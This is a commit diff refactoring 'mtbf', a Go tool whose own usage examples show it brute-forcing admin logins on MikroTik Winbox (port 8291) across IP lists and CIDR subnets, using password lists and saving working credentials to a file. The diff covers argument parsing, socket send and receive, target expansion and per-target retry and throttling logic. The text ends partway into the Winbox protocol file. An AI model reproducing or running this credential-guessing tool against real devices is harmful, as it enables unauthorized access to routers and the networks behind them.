feat: refactor

master
Dave S. 2 years ago
parent 68fee6bbb7
commit ac9935a4e0
  1. 2
      bigint.go
  2. 383
      config.go
  3. 60
      conn.go
  4. 12
      crypt.go
  5. 350
      endpoint.go
  6. 154
      eparse.go
  7. 2
      go.mod
  8. 679
      legacy-winbox.go
  9. 28
      log.go
  10. 3
      math.go
  11. 8
      mtbf.go
  12. 57
      results.go
  13. 3
      service.go
  14. 334
      source.go
  15. 136
      task.go
  16. 130
      thread.go
  17. 21
      winbox.go

@ -1,5 +1,7 @@
package main
// bigint.go: methods for bigint operation chaining
import (
"math/big"
)

@ -8,6 +8,74 @@ import (
"time"
)
var configMap = map[string]configParameter{}
var configAliasMap = map[string]string{}
func init() {
registerCommand("help", "show program usage", func() {
log("", 0, "options:")
parms := make([]string, 0, len(configMap))
for key := range configMap {
parms = append(parms, key)
}
sort.Strings(parms)
for _, parmName := range parms {
parm := configMap[parmName]
if parm.hidden {
continue
}
header := "-" + parm.name
if len(parm.name) > 1 {
header = "-" + header
}
aliases := []string{}
for alias, target := range configAliasMap {
if target == parm.name {
if len(alias) == 1 {
aliases = append(aliases, "-"+alias)
} else {
aliases = append(aliases, "--"+alias)
}
}
}
if len(aliases) > 0 {
sort.Strings(aliases)
header = header + " (aliases: " + strings.Join(aliases, ", ") + ")"
}
header = header + ":"
description := " (description missing)"
if parm.description != "" {
description = " " + parm.description
}
if parm.command || parm.sw {
log("", 0, "%s\n%s", header, description)
} else {
log("", 0, "%s\n%s\n default: %v", header, description, parm.value)
}
}
log("", 0, "")
log("", 0, "examples:")
log("", 0, " single target:")
log("", 0, " ./mtbf --ip 127.0.0.1 --port 8291 --login admin --password 12345678 --out-file good.txt")
log("", 0, " multiple targets with multiple passwords:")
log("", 0, " ./mtbf --ip-list ips.txt --port 8291 --login admin --password-list passwords.txt --out-file good.txt")
os.Exit(0)
})
registerAlias("?", "help")
registerAlias("h", "help")
}
// configParameterOptions represents additional options for a configParameter.
type configParameterOptions struct {
sw, hidden, command bool
@ -24,16 +92,128 @@ type configParameter struct {
}
type configParameterTypeUnion = interface {
bool | int | uint | float64 | string | []int | []uint | []float64 | []string | []bool
bool | int | uint | float64 | string | []int | []uint | []float64 | []string | []bool | map[string]bool
}
var configMap = map[string]configParameter{}
var configAliasMap = map[string]string{}
// --------------
// parsing
// --------------
func parseAppConfig() {
log("cfg", 1, "parsing config")
totalFinalized := 0
for i := 1; i < len(os.Args); i++ {
arg := getCmdlineParm(i)
if len(arg) == 0 {
continue
}
failIf(arg[0] != '-', "\"%v\" is not a commandline parameter", arg)
arg = strings.TrimPrefix(arg, "-")
arg = strings.TrimPrefix(arg, "-")
failIf(len(arg) == 0, "\"%v\" is not a commandline parameter", getCmdlineParm(i))
parm, ok := configMap[strings.ToLower(arg)]
if !ok {
alias, ok := configAliasMap[strings.ToLower(arg)]
failIf(!ok, "unknown commandline parameter: \"%v\"", arg)
parm, ok = configMap[alias]
failIf(!ok, "alias \"%v\" references unknown commandline parameter", arg)
log("cfg", 3, "\"%v\" is aliased to \"%v\"", alias, parm.name)
}
failIf(parm.hidden, "\"%v\" is not a commandline parameter", getCmdlineParm(i))
failIf(parm.parsed && !parm.isSlice(), "multiple occurrences of commandline parameter \"%v\" are not allowed", parm.name)
if !parm.command {
if parm.sw {
parm.writeParmValue("true")
} else {
i++
parm.writeParmValue(getCmdlineParm(i))
}
}
var configParsingFinished = false
parm.finalize()
totalFinalized++
}
log("cfg", 1, "parsed %v commandline parameters", totalFinalized)
}
// getCmdlineParm retrieves a commandline parameter with index i.
func getCmdlineParm(i int) string {
return strings.TrimSpace(os.Args[i])
}
// isSlice checks if a configParameter value is a slice.
func (parm *configParameter) isSlice() bool {
switch parm.value.(type) {
case []int, []uint, []string:
return true
default:
return false
}
}
// writeParmValue saves raw commandline value into a configParameter.
func (parm *configParameter) writeParmValue(value string) {
var err error
switch parm.value.(type) {
case bool:
parm.value, err = strconv.ParseBool(value)
failIf(err != nil, "config parameter \"%v\" must be a boolean", parm.name)
case int:
v, err := strconv.ParseInt(value, 10, 0)
failIf(err != nil, "config parameter \"%v\" must be an integer", parm.name)
parm.value = int(v)
case uint:
v, err := strconv.ParseUint(value, 10, 0)
failIf(err != nil, "config parameter \"%v\" must be an unsigned integer", parm.name)
parm.value = uint(v)
case string:
parm.value = value
case []bool:
b, err := strconv.ParseBool(value)
failIf(err != nil, "config parameter \"%v\" must be a boolean", parm.name)
parm.value = append(parm.value.([]bool), b)
case []int:
i, err := strconv.ParseInt(value, 10, 0)
failIf(err != nil, "config parameter \"%v\" must be an integer", parm.name)
parm.value = append(parm.value.([]int), int(i))
case []uint:
u, err := strconv.ParseUint(value, 10, 0)
failIf(err != nil, "config parameter \"%v\" must be an unsigned integer", parm.name)
parm.value = append(parm.value.([]uint), uint(u))
case []string:
parm.value = append(parm.value.([]string), value)
default:
fail("unknown config parameter \"%v\" type: %T", parm.name, parm.value)
}
}
// finalize marks a configParameter as parsed, adds it to a global config map
// and calls its callback, if one is present.
func (parm *configParameter) finalize() {
parm.parsed = true
configMap[parm.name] = *parm
if parm.callback != nil {
parm.callback()
}
// ---
log("cfg", 2, "parse: %T \"%v\" -> def %v, now %v", parm.value, parm.name, parm.def, parm.value)
}
// --------------
// registration
// --------------
func registerConfigParameter[T configParameterTypeUnion](name string, def T, description string, opts configParameterOptions) {
name = strings.ToLower(name)
@ -54,10 +234,6 @@ func registerParam[T configParameterTypeUnion](name string, def T, description s
registerConfigParameter(name, def, description, configParameterOptions{})
}
func registerParamEx[T configParameterTypeUnion](name string, def T, description string, options configParameterOptions) {
registerConfigParameter(name, def, description, options)
}
func registerParamHidden[T configParameterTypeUnion](name string, def T) {
registerConfigParameter(name, def, "", configParameterOptions{hidden: true})
}
@ -89,8 +265,9 @@ func registerAlias(alias, target string) {
configAliasMap[alias] = target
}
// ---
// --------------
// acquisition
// --------------
func getParamGeneric(name string) any {
name = strings.ToLower(name)
@ -150,8 +327,9 @@ func getParamDurationMS(name string) time.Duration {
return time.Duration(tm) * time.Millisecond
}
// ---
// --------------
// setting
// --------------
func setParam(name string, value any) {
name = strings.ToLower(name)
@ -169,186 +347,3 @@ func setParam(name string, value any) {
configMap[name] = parm
}
// ---
// parsing
// getCmdlineParm retrieves a commandline parameter with index i.
func getCmdlineParm(i int) string {
return strings.TrimSpace(os.Args[i])
}
// isSlice checks if a configParameter value is a slice.
func (parm *configParameter) isSlice() bool {
switch parm.value.(type) {
case []int, []uint, []string:
return true
default:
return false
}
}
// writeParmValue saves raw commandline value into a configParameter.
func (parm *configParameter) writeParmValue(value string) {
var err error
switch parm.value.(type) {
case bool:
parm.value, err = strconv.ParseBool(value)
failIf(err != nil, "config parameter \"%v\" must be a boolean", parm.name)
case int:
v, err := strconv.ParseInt(value, 10, 0)
failIf(err != nil, "config parameter \"%v\" must be an integer", parm.name)
parm.value = int(v)
case uint:
v, err := strconv.ParseUint(value, 10, 0)
failIf(err != nil, "config parameter \"%v\" must be an unsigned integer", parm.name)
parm.value = uint(v)
case string:
parm.value = value
case []bool:
b, err := strconv.ParseBool(value)
failIf(err != nil, "config parameter \"%v\" must be a boolean", parm.name)
parm.value = append(parm.value.([]bool), b)
case []int:
i, err := strconv.ParseInt(value, 10, 0)
failIf(err != nil, "config parameter \"%v\" must be an integer", parm.name)
parm.value = append(parm.value.([]int), int(i))
case []uint:
u, err := strconv.ParseUint(value, 10, 0)
failIf(err != nil, "config parameter \"%v\" must be an unsigned integer", parm.name)
parm.value = append(parm.value.([]uint), uint(u))
case []string:
parm.value = append(parm.value.([]string), value)
default:
fail("unknown config parameter \"%v\" type: %T", parm.name, parm.value)
}
}
// finalize marks a configParameter as parsed, adds it to a global config map
// and calls its callback, if one is present.
func (parm *configParameter) finalize() {
parm.parsed = true
configMap[parm.name] = *parm
if parm.callback != nil {
parm.callback()
}
log("cfg", 2, "parse: %T \"%v\" -> def %v, now %v", parm.value, parm.name, parm.def, parm.value)
}
func parseAppConfig() {
log("cfg", 1, "parsing config")
totalFinalized := 0
for i := 1; i < len(os.Args); i++ {
arg := getCmdlineParm(i)
if len(arg) == 0 {
continue
}
failIf(arg[0] != '-', "\"%v\" is not a commandline parameter", arg)
arg = strings.TrimPrefix(arg, "-")
arg = strings.TrimPrefix(arg, "-")
failIf(len(arg) == 0, "\"%v\" is not a commandline parameter", getCmdlineParm(i))
parm, ok := configMap[strings.ToLower(arg)]
if !ok {
alias, ok := configAliasMap[strings.ToLower(arg)]
failIf(!ok, "unknown commandline parameter: \"%v\"", arg)
parm, ok = configMap[alias]
failIf(!ok, "alias \"%v\" references unknown commandline parameter", arg)
log("cfg", 3, "\"%v\" is aliased to \"%v\"", alias, parm.name)
}
failIf(parm.hidden, "\"%v\" is not a commandline parameter", getCmdlineParm(i))
failIf(parm.parsed && !parm.isSlice(), "multiple occurrences of commandline parameter \"%v\" are not allowed", parm.name)
if !parm.command {
if parm.sw {
parm.writeParmValue("true")
} else {
i++
parm.writeParmValue(getCmdlineParm(i))
}
}
parm.finalize()
totalFinalized++
}
log("cfg", 1, "parsed %v commandline parameters", totalFinalized)
configParsingFinished = true
}
func showHelp() {
log("", 0, "options:")
parms := make([]string, 0, len(configMap))
for key := range configMap {
parms = append(parms, key)
}
sort.Strings(parms)
for _, parmName := range parms {
parm := configMap[parmName]
if parm.hidden {
continue
}
header := "-" + parm.name
if len(parm.name) > 1 {
header = "-" + header
}
aliases := []string{}
for alias, target := range configAliasMap {
if target == parm.name {
if len(alias) == 1 {
aliases = append(aliases, "-"+alias)
} else {
aliases = append(aliases, "--"+alias)
}
break
}
}
if len(aliases) > 0 {
sort.Strings(aliases)
header = header + " (aliases: " + strings.Join(aliases, ", ") + ")"
}
header = header + ":"
description := " (description missing)"
if parm.description != "" {
description = " " + parm.description
}
if parm.command || parm.sw {
log("", 0, "%s\n%s", header, description)
} else {
log("", 0, "%s\n%s\n default: %v", header, description, parm.value)
}
}
log("", 0, "")
log("", 0, "examples:")
log("", 0, " single target:")
log("", 0, " ./mtbf --ip 127.0.0.1 --port 8291 --login admin --password 12345678 --out-file good.txt")
log("", 0, " multiple targets with multiple passwords:")
log("", 0, " ./mtbf --ip-list ips.txt --port 8291 --login admin --password-list passwords.txt --out-file good.txt")
os.Exit(0)
}
func init() {
registerCommand("help", "show program usage", showHelp)
registerAlias("?", "help")
registerAlias("h", "help")
}

@ -10,17 +10,37 @@ type Connection struct {
dialer net.Dialer
socket net.Conn
connectTimeout time.Duration
readTimeout time.Duration
sendTimeout time.Duration
recvTimeout time.Duration
protocol string
}
// NewConnection creates a Connection object.
func NewConnection() *Connection {
func init() {
registerParam("connect-timeout-ms", 3000, "")
registerParam("send-timeout-ms", 2000, "")
registerParam("recv-timeout-ms", 1000, "")
}
// NewConnection creates a Connection object and optionally connects to an Endpoint.
func NewConnection(endpoint *Endpoint) (*Connection, error) {
conn := Connection{}
conn.connectTimeout = getParamDurationMS("connect-timeout-ms")
conn.readTimeout = getParamDurationMS("read-timeout-ms")
conn.sendTimeout = getParamDurationMS("send-timeout-ms")
conn.recvTimeout = getParamDurationMS("recv-timeout-ms")
conn.protocol = "tcp"
return &conn
if endpoint != nil {
return &conn, conn.Connect(endpoint)
} else {
return &conn, nil
}
}
func (conn *Connection) Close() {
if conn.socket != nil {
conn.socket.Close()
conn.socket = nil
}
}
// Connect initiates a connection to an Endpoint.
@ -31,7 +51,7 @@ func (conn *Connection) Connect(endpoint *Endpoint) (err error) {
log("conn", 2, "cannot connect to \"%v\": %v", endpoint, err.Error())
}
return err
return
}
// SetConnectTimeout sets a custom connect timeout on a Connection.
@ -39,12 +59,28 @@ func (conn *Connection) SetConnectTimeout(timeout time.Duration) {
conn.connectTimeout = timeout
}
// SetReadTimeout sets a custom read timeout on a Connection.
func (conn *Connection) SetReadTimeout(timeout time.Duration) {
conn.readTimeout = timeout
// Send writes data to a Connection.
func (conn *Connection) Send(data []byte) (err error) {
if len(data) == 0 {
log("conn", 1, "tried to send empty buffer to a socket, ignoring")
return nil
}
conn.socket.SetWriteDeadline(time.Now().Add(conn.sendTimeout))
_, err = conn.socket.Write(data)
return
}
// Send writes data to a Connection.
func (conn *Connection) Send(data []byte) {
conn.socket.SetReadDeadline(time.Now().Add(conn.readTimeout))
// Recv receives data from a Connection.
func (conn *Connection) Recv() (data []byte, err error) {
conn.socket.SetReadDeadline(time.Now().Add(conn.recvTimeout))
data = make([]byte, 1024)
n, err := conn.socket.Read(data)
if err != nil {
return nil, err
}
data = data[:n]
return
}

@ -1,5 +1,7 @@
package main
// crypt.go: various cryptographical operations
import (
"crypto/hmac"
cryptoRand "crypto/rand"
@ -9,6 +11,11 @@ import (
"strings"
)
func init() {
registerSwitch("crypt-predictable-rng", "disable secure rng and use a pseudorandom preseeded rng")
mathRand.Seed(300)
}
func getSHA1Digest(data []byte) []byte {
array := sha1.Sum(data)
return array[:]
@ -96,8 +103,3 @@ func genRandomBytes(n int) ([]byte, error) {
return b, nil
}
func init() {
registerSwitch("crypt-predictable-rng", "disable secure rng and use a pseudorandom preseeded rng")
mathRand.Seed(300)
}

@ -2,14 +2,74 @@ package main
import (
"container/list"
"errors"
"net"
"strconv"
"strings"
"sync"
"time"
)
func init() {
endpoints = list.New()
delayedEndpoints = list.New()
registerParam("port", []int{8291}, "one or more default ports")
registerParam("max-aps", 5, "maximum number of attempts per second for an endpoint")
registerSwitch("no-ipv6", "skip IPv6 entries")
registerSwitch("append-default-ports", "always append default ports even for targets in host:port format")
registerSwitch("strict-subnets", "strict subnet behaviour: ignore network and broadcast addresses in /30 and bigger subnets")
registerSwitch("keep-endpoint-on-good", "keep processing endpoint if a login/password was found")
registerParam("conn-ratio", 0.15, "keep a failed endpoint if its bad/good connection ratio is lower than this value")
registerParam("max-bad-after-good-conn", 5, "how many consecutive bad connections to allow after a good connection")
registerParam("max-bad-conn", 20, "always remove endpoint after this many consecutive bad connections")
registerParam("min-bad-conn", 2, "do not consider removing an endpoint if it does not have this many consecutive bad connections")
registerParam("proto-error-ratio", 0.25, "keep endpoints with a protocol error if their protocol error ratio is lower than this value")
registerParam("max-proto-errors", 20, "always remove endpoint after this many consecutive protocol errors")
registerParam("min-proto-errors", 4, "do not consider removing an endpoint if it does not have this many consecutive protocol errors")
registerParam("read-error-ratio", 0.25, "keep endpoints with a read error if their read error ratio is lower than this value")
registerParam("max-read-errors", 20, "always remove endpoint after this many consecutive read errors")
registerParam("min-read-errors", 3, "do not consider removing an endpoint if it does not have this many consecutive read errors")
registerParam("no-response-delay-ms", 2000, "wait for this number of ms if an endpoint does not respond")
registerParam("read-error-delay-ms", 5000, "wait for this number of ms if an endpoint returns a read error")
registerParam("protocol-error-delay-ms", 5000, "wait for this number of ms if an endpoint returns a protocol error")
}
// FetchEndpoint retrieves an endpoint: first, a delayed list is queried,
// then, if nothing is found, a normal list is searched.
// If all endpoints are delayed, a wait time is returned.
func FetchEndpoint() (e *Endpoint, waitTime time.Duration) {
globalEndpointMutex.Lock()
defer globalEndpointMutex.Unlock()
log("ep", 4, "fetching an endpoint")
e, waitTime = GetDelayedEndpoint()
if e != nil {
log("ep", 4, "fetched a delayed endpoint: \"%v\"", e)
return e, 0
}
el := endpoints.Front()
if el == nil {
if waitTime == 0 {
log("ep", 1, "out of endpoints")
return nil, 0
}
log("ep", 4, "all endpoints are delayed, waiting for %v", waitTime)
return nil, waitTime
}
endpoints.MoveToBack(el)
e = el.Value.(*Endpoint)
log("ep", 4, "fetched a normal endpoint: \"%v\"", e)
return e, 0
}
type Address struct {
ip string // TODO: switch to a static 16-byte array
port int
@ -28,8 +88,9 @@ const (
type Endpoint struct {
addr Address // IP address of an endpoint
loginPos, passwordPos SourcePos // login/password cursors
listElement *list.Element // position in list
loginPos SourcePos
passwordPos SourcePos // login/password cursors
listElement *list.Element // position in list
state EndpointState // which state an endpoint is in
delayUntil time.Time // when this endpoint can be used again
@ -151,28 +212,10 @@ func (e *Endpoint) Delay(addTime time.Duration) {
}
}
// MigrateToNormal moves an Endpoint to a normal queue.
// Endpoint mutex is assumed to be taken.
func (e *Endpoint) MigrateToNormal() {
endpointMutex.Lock()
defer endpointMutex.Unlock()
if e.normalList != nil {
log("ep", 5, "cannot migrate endpoint \"%v\" to normal list: already in the list", e)
} else {
log("ep", 5, "migrating endpoint \"%v\" to normal list", e)
e.normalList = endpoints.PushBack(e)
if e.delayedList != nil {
delayedEndpoints.Remove(e.delayedList)
e.delayedList = nil
}
}
}
// SkipLogin gets the endpoint's current login,
// compares it with user-defined login and skips (advances) it if
// both logins are equal.
func (e *Endpoint) SkipLogin(login) {
func (e *Endpoint) SkipLogin(login string) {
// attempt to fetch next login
curLogin, empty := SrcLogin.FetchOne(&e.loginPos, false)
if curLogin == login && !empty { // this login has not yet been exhausted?
@ -278,12 +321,12 @@ func (e *Endpoint) Bad() {
e.consecutiveProtoErrors = 0
// The endpoint may be in delayed queue, so push it back to the normal queue.
e.MigrateToNormal()
e.SetState(ES_Normal)
}
// Good is an event handler that gets called when
// an authentication attempt to an Endpoint succeeds.
func (e *Endpoint) Good(login) {
func (e *Endpoint) Good(login string) {
e.mutex.Lock()
defer e.mutex.Unlock()
e.consecutiveProtoErrors = 0
@ -291,7 +334,7 @@ func (e *Endpoint) Good(login) {
if !getParamSwitch("keep-endpoint-on-good") {
e.Delete()
} else {
e.MigrateToNormal()
e.SetState(ES_Normal)
e.SkipLogin(login)
}
}
@ -372,257 +415,24 @@ func (e *Endpoint) Exhausted() {
func GetDelayedEndpoint() (e *Endpoint, waitTime time.Duration) {
currentTime := time.Now()
if delayedEndpoints.Empty() {
if delayedEndpoints.Len() == 0 {
log("ep", 5, "delayed endpoint list is empty")
return nil, 0
}
it := delayedEndpoints.IteratorAt(delayedEndpoints.Left())
for {
k, v := it.Key().(time.Time), it.Value().(*Endpoint)
if v == nil {
panic("delayed endpoint list contains an empty endpoint")
return nil, 0
}
if k.After(currentTime) {
log("ep", 5, "no delayed endpoints can be processed at this time")
return nil, k.Sub(currentTime)
}
if k.Before(v.delayUntil) {
log("ep", 5, "delayed endpoint was re-delayed: removing lingering definition")
defer delayedEndpoints.Remove(k)
it.Next()
continue
}
if v.delayUntil.IsZero() {
log("ep", 5, "delayed endpoint is already in normal queue: removing lingering definition")
defer delayedEndpoints.Remove(k)
it.Next()
continue
}
defer delayedEndpoints.Remove(k)
return v, 0
}
log("ep", 5, "delayed endpoint list was holding only lingering definitions and is now empty")
return nil, 0
}
// FetchEndpoint retrieves an endpoint: first, a delayed list is queried,
// then, if nothing is found, a normal list is searched,
// and (TODO) if this list is empty or will soon be emptied,
// a new batch of endpoints gets created.
func FetchEndpoint() (e *Endpoint, waitTime time.Duration) {
globalEndpointMutex.Lock()
defer globalEndpointMutex.Unlock()
log("ep", 4, "fetching an endpoint")
e, waitTime = GetDelayedEndpoint()
if e != nil {
log("ep", 4, "fetched a delayed endpoint: \"%v\"", e)
return e, 0
}
el := endpoints.Front()
if el == nil {
if waitTime == 0 {
log("ep", 1, "out of endpoints")
return nil, 0
}
log("ep", 4, "all endpoints are delayed, waiting for %v", waitTime)
return nil, waitTime
}
endpoints.MoveToBack(el)
e = el.Value.(*Endpoint)
minWaitTime := time.Time{}
log("ep", 4, "fetched an endpoint: \"%v\"", e)
return e, 0
}
// ---
// ---
// ---
// Safety feature, to avoid expanding subnets into a huge amount of IPs.
const maxNetmaskSize = 22 // expands into /10 for IPv4
// RegisterEndpoint builds an Endpoint and puts it to a global list of endpoints.
func RegisterEndpoint(ip string, ports []int, isIPv6 bool) int {
for _, port := range ports {
ep := Endpoint{addr: Address{ip: ip, port: port, v6: isIPv6}}
ep.loginPos.Reset()
ep.passwordPos.Reset()
ep.listElement = endpoints.PushBack(&ep)
log("ep", 3, "registered endpoint: %v", &ep)
}
return len(ports)
}
func incIP(ip net.IP) {
for j := len(ip) - 1; j >= 0; j-- {
ip[j]++
if ip[j] > 0 {
break
for e := delayedEndpoints.Front(); e != nil; e = e.Next() {
dt := e.Value.(*Endpoint)
if minWaitTime.IsZero() || (dt.delayUntil.Before(minWaitTime) && dt.delayUntil.After(currentTime)) {
minWaitTime = dt.delayUntil
}
}
}
// parseCIDR registers multiple endpoints from a CIDR netmask.
func parseCIDR(ip string, ports []int, isIPv6 bool) int {
na, nm, err := net.ParseCIDR(ip)
if err != nil {
log("ep", 0, "failed to parse CIDR notation for \"%v\": %v", ip, err.Error())
return 0
}
mask, maskBits := nm.Mask.Size()
if mask < maskBits-maxNetmaskSize {
log("ep", 0, "ignoring out of safe bounds CIDR netmask for \"%v\": %v (max: %v, allowed: %v)", ip, mask, maskBits, maxNetmaskSize)
return 0
}
curHost := 0
maxHost := 1<<(maskBits-mask) - 1
numParsed := 0
strict := getParamSwitch("strict-subnets")
log("ep", 2, "expanding CIDR: \"%v\" to %v hosts", ip, maxHost+1)
for expIP := na.Mask(nm.Mask); nm.Contains(expIP); incIP(expIP) {
if strict && (curHost == 0 || curHost == maxHost) && maskBits-mask >= 2 {
log("ep", 1, "ignoring network/broadcast address due to strict-subnets: \"%v\"", expIP.String())
} else {
numParsed += RegisterEndpoint(expIP.String(), ports, isIPv6)
if dt.delayUntil.Before(currentTime) {
delayedEndpoints.Remove(e)
return dt, 0
}
curHost++
}
return numParsed
}
// parseIPOrCIDR expands plain IP or CIDR to multiple endpoints.
func parseIPOrCIDR(ip string, ports []int, isIPv6 bool) int {
// ip may be a domain name, a CIDR subnet or an IP address
// CIDR subnets must be expanded to plain IPs
if strings.LastIndex(ip, "/") >= 0 { // this is a CIDR subnet
return parseCIDR(ip, ports, isIPv6)
} else if strings.Count(ip, "/") > 1 { // invalid CIDR notation
log("ep", 0, "invalid CIDR subnet format: \"%v\", ignoring", ip)
return 0
} else { // otherwise, just register
return RegisterEndpoint(ip, ports, isIPv6)
}
}
// extractIPAndPort extracts all endpoint components.
func extractIPAndPort(str string) (ip string, port int, err error) {
var portString string
ip, portString, err = net.SplitHostPort(str)
if err != nil {
return "", 0, err
}
port, err = strconv.Atoi(portString)
if err != nil {
return "", 0, err
}
if port <= 0 || port > 65535 {
return "", 0, errors.New("invalid port: " + strconv.Itoa(port))
}
return ip, port, nil
}
// ParseEndpoints takes a string slice of IPs/CIDR subnets and converts it to a list of endpoints.
func ParseEndpoints(source []string) {
log("ep", 1, "parsing endpoints")
totalIPv6Skipped := 0
numParsed := 0
for _, str := range source {
if !strings.Contains(str, ":") {
// no ":": this is an ipv4/dn without port,
// parse it with all known ports
numParsed += parseIPOrCIDR(str, getParamIntSlice("port"), false)
} else {
// either ipv4/dn with port, or ipv6 with/without port
isIPv6 := strings.Count(str, ":") > 1
if isIPv6 && getParamSwitch("no-ipv6") {
totalIPv6Skipped++
continue
}
if !strings.Contains(str, "]:") && strings.Contains(str, "::") {
// ipv6 without port
numParsed += parseIPOrCIDR(str, getParamIntSlice("port"), true)
continue
}
ip, port, err := extractIPAndPort(str)
if err != nil {
log("ep", 0, "failed to extract ip/port for \"%v\": %v, ignoring endpoint", str, err.Error())
continue
}
ports := []int{port}
// append all default ports
if getParamSwitch("append-default-ports") {
for _, port2 := range getParamIntSlice("port") {
if port != port2 {
ports = append(ports, port2)
}
}
}
numParsed += parseIPOrCIDR(ip, ports, isIPv6)
}
}
logIf(totalIPv6Skipped > 0, "ep", 0, "skipped %v IPv6 targets due to no-ipv6 flag", totalIPv6Skipped)
log("ep", 1, "finished parsing endpoints: parsed %v out of total %v", numParsed, endpoints.Len())
}
func init() {
endpoints = list.New()
delayedEndpoints = list.New()
registerParam("port", []int{8291}, "one or more default ports")
registerParam("max-aps", 5, "maximum number of attempts per second for an endpoint")
registerSwitch("no-ipv6", "skip IPv6 entries")
registerSwitch("append-default-ports", "always append default ports even for targets in host:port format")
registerSwitch("strict-subnets", "strict subnet behaviour: ignore network and broadcast addresses in /30 and bigger subnets")
registerSwitch("keep-endpoint-on-good", "keep processing endpoint if a login/password was found")
registerParam("conn-ratio", 0.15, "keep a failed endpoint if its bad/good connection ratio is lower than this value")
registerParam("max-bad-after-good-conn", 5, "how many consecutive bad connections to allow after a good connection")
registerParam("max-bad-conn", 20, "always remove endpoint after this many consecutive bad connections")
registerParam("min-bad-conn", 2, "do not consider removing an endpoint if it does not have this many consecutive bad connections")
registerParam("proto-error-ratio", 0.25, "keep endpoints with a protocol error if their protocol error ratio is lower than this value")
registerParam("max-proto-errors", 20, "always remove endpoint after this many consecutive protocol errors")
registerParam("min-proto-errors", 4, "do not consider removing an endpoint if it does not have this many consecutive protocol errors")
registerParam("read-error-ratio", 0.25, "keep endpoints with a read error if their read error ratio is lower than this value")
registerParam("max-read-errors", 20, "always remove endpoint after this many consecutive read errors")
registerParam("min-read-errors", 3, "do not consider removing an endpoint if it does not have this many consecutive read errors")
registerParam("no-response-delay-ms", 2000, "wait for this number of ms if an endpoint does not respond")
registerParam("read-error-delay-ms", 5000, "wait for this number of ms if an endpoint returns a read error")
registerParam("protocol-error-delay-ms", 5000, "wait for this number of ms if an endpoint returns a protocol error")
return nil, minWaitTime.Sub(currentTime)
}

@ -0,0 +1,154 @@
package main
import (
"errors"
"net"
"strconv"
"strings"
)
// Safety feature, to avoid expanding subnets into a huge amount of IPs.
const maxNetmaskSize = 22 // expands into /10 for IPv4
// RegisterEndpoint builds an Endpoint and puts it to a global list of endpoints.
func RegisterEndpoint(ip string, ports []int, isIPv6 bool) int {
for _, port := range ports {
ep := Endpoint{addr: Address{ip: ip, port: port, v6: isIPv6}}
ep.loginPos.Reset()
ep.passwordPos.Reset()
ep.listElement = endpoints.PushBack(&ep)
log("ep", 3, "registered endpoint: %v", &ep)
}
return len(ports)
}
func incIP(ip net.IP) {
for j := len(ip) - 1; j >= 0; j-- {
ip[j]++
if ip[j] > 0 {
break
}
}
}
// parseCIDR registers multiple endpoints from a CIDR netmask.
func parseCIDR(ip string, ports []int, isIPv6 bool) int {
na, nm, err := net.ParseCIDR(ip)
if err != nil {
log("ep", 0, "failed to parse CIDR notation for \"%v\": %v", ip, err.Error())
return 0
}
mask, maskBits := nm.Mask.Size()
if mask < maskBits-maxNetmaskSize {
log("ep", 0, "ignoring out of safe bounds CIDR netmask for \"%v\": %v (max: %v, allowed: %v)", ip, mask, maskBits, maxNetmaskSize)
return 0
}
curHost := 0
maxHost := 1<<(maskBits-mask) - 1
numParsed := 0
strict := getParamSwitch("strict-subnets")
log("ep", 2, "expanding CIDR: \"%v\" to %v hosts", ip, maxHost+1)
for expIP := na.Mask(nm.Mask); nm.Contains(expIP); incIP(expIP) {
if strict && (curHost == 0 || curHost == maxHost) && maskBits-mask >= 2 {
log("ep", 1, "ignoring network/broadcast address due to strict-subnets: \"%v\"", expIP.String())
} else {
numParsed += RegisterEndpoint(expIP.String(), ports, isIPv6)
}
curHost++
}
return numParsed
}
// parseIPOrCIDR expands plain IP or CIDR to multiple endpoints.
func parseIPOrCIDR(ip string, ports []int, isIPv6 bool) int {
// ip may be a domain name, a CIDR subnet or an IP address
// CIDR subnets must be expanded to plain IPs
if strings.LastIndex(ip, "/") >= 0 { // this is a CIDR subnet
return parseCIDR(ip, ports, isIPv6)
} else if strings.Count(ip, "/") > 1 { // invalid CIDR notation
log("ep", 0, "invalid CIDR subnet format: \"%v\", ignoring", ip)
return 0
} else { // otherwise, just register
return RegisterEndpoint(ip, ports, isIPv6)
}
}
// extractIPAndPort extracts all endpoint components.
func extractIPAndPort(str string) (ip string, port int, err error) {
var portString string
ip, portString, err = net.SplitHostPort(str)
if err != nil {
return "", 0, err
}
port, err = strconv.Atoi(portString)
if err != nil {
return "", 0, err
}
if port <= 0 || port > 65535 {
return "", 0, errors.New("invalid port: " + strconv.Itoa(port))
}
return ip, port, nil
}
// ParseEndpoints takes a string slice of IPs/CIDR subnets and converts it to a list of endpoints.
func ParseEndpoints(source []string) {
log("ep", 1, "parsing endpoints")
totalIPv6Skipped := 0
numParsed := 0
for _, str := range source {
if !strings.Contains(str, ":") {
// no ":": this is an ipv4/dn without port,
// parse it with all known ports
numParsed += parseIPOrCIDR(str, getParamIntSlice("port"), false)
} else {
// either ipv4/dn with port, or ipv6 with/without port
isIPv6 := strings.Count(str, ":") > 1
if isIPv6 && getParamSwitch("no-ipv6") {
totalIPv6Skipped++
continue
}
if !strings.Contains(str, "]:") && strings.Contains(str, "::") {
// ipv6 without port
numParsed += parseIPOrCIDR(str, getParamIntSlice("port"), true)
continue
}
ip, port, err := extractIPAndPort(str)
if err != nil {
log("ep", 0, "failed to extract ip/port for \"%v\": %v, ignoring endpoint", str, err.Error())
continue
}
ports := []int{port}
// append all default ports
if getParamSwitch("append-default-ports") {
for _, port2 := range getParamIntSlice("port") {
if port != port2 {
ports = append(ports, port2)
}
}
}
numParsed += parseIPOrCIDR(ip, ports, isIPv6)
}
}
logIf(totalIPv6Skipped > 0, "ep", 0, "skipped %v IPv6 targets due to no-ipv6 flag", totalIPv6Skipped)
log("ep", 1, "finished parsing endpoints: parsed %v out of total %v", numParsed, endpoints.Len())
}

@ -1,3 +1,3 @@
module mtbf
go 1.18
go 1.18

@ -1,13 +1,13 @@
package main
import (
"bytes"
"crypto/md5"
"encoding/binary"
"errors"
"fmt"
"io"
"strconv"
"bytes"
"crypto/md5"
"encoding/binary"
"errors"
"fmt"
"io"
"strconv"
)
const MT_BOOL_FALSE byte = 0x00
@ -25,415 +25,396 @@ const MT_REQUEST_ID = 0xFF0006
const MT_COMMAND = 0xFF0007
type M2Element struct {
code int
value interface{}
code int
value interface{}
}
func (el *M2Element) String() string {
return fmt.Sprintf("code=%v,type=%T,value=%v", el.code, el.value, el.value)
return fmt.Sprintf("code=%v,type=%T,value=%v", el.code, el.value, el.value)
}
type M2Message struct {
el []M2Element
el []M2Element
}
